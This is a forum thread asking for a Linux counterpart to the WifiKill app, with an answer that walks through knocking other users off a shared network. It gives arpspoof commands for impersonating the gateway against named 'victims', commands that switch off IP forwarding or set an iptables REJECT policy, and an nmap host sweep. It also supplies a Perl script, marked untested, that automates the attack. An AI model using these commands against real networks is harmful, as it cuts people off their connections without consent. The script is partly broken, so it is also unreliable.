A PC application similar to Wifikill in Android [closed]

Is there any (preferably Linux) program similar to the WifiKill Android app?

4

2 Answers

Well, Android is Linux therefore you can replicate the actions of ponury's WifiKill on your Linux computer

WifiKill does two things:

  1. It masqurerades as the gateway, so the victims would send packets to the phone instead of sendng them to the gateway
  2. It turns off packet forwarding. Therefore, the victims will send all packets to your computer which will drop them

For masquerading you need ARP spoofing. You can use the arpspoof command from dsniff:

  1. First, you must know the IP of the gateway. Run route -n in a terminal and get the gateway's IP from there. In the most common case (you are only connected to the wireless network), the gateway would be the entry with Destination 0.0.0.0. You can use route -n|grep ^0.0.0.0|cut -d' ' -f 10 to get the IP of the default gateway
  2. Then, use arpspoof to masquerade as the gateway. Run arpspoof $IP as root if you want to kill the whole network except for you, or run arpspoof -t $VICTIM_IP $IP for each victim if you want to kill only certain hosts

Now you are masquerading as the network's gateway. All packets sent by the victims are sent to your computer. You now have to turn off packet forwarding. To do this run echo -n 0 > /proc/sys/net/ipv?/ip_forward as root. This will drop all packets sent by the victims

It's been a long time since I last used WifiKill, but I remember it had a option to reject packets instead of dropping them [ rejecting gives people an instant connection error, dropping lets all their connections time out ]. To do this, you have to:

  1. Enable packet forwarding by running echo -n 1 > /proc/sys/net/ipv?/ip_forward as root
  2. Set netfilter's default FORWARD policy to REJECT. Run iptables -P FORWARD REJECT. Of course, you can use iptables for arbitrarily complex firewalling rules

WifiKill also lists the online hosts. To do this in Linux, you can use nmap to ping hosts in a given range. For example, if you want to find out what hosts are online in the range 192.168.1.1 to 192.168.1.254 you can run nmap -sP 192.168.1.1-254. While this will not list computers with 'stealth' firewalls, you can still kill these computers if you kill everybody on the network or if you know their exact IP

There might be a program out there doing what I listed above, but for the common case you can write a script:

#!/usr/bin/perl -w
#This is untested code. Compiling works, but I haven't tested anything more
my $gw=`route -n|grep ^0.0.0.0|cut -d' ' -f 10`;
if (@ARGV) { print "arpspoof -t $_ $gw &" for (@ARGV);
} else { print "arpspoof $gw &";
}
system "echo 0 > $_" for(</proc/sys/net/ipv?/ip_forward>);

Save this as kill.pl then call it as ./kill.pl $IP1 $IP2 ... $IPn to kill $IP1, $IP2, ..., $IPn or as ./kill.pl to kill all hosts

1

Netcut for Windows does similar task.

You Might Also Like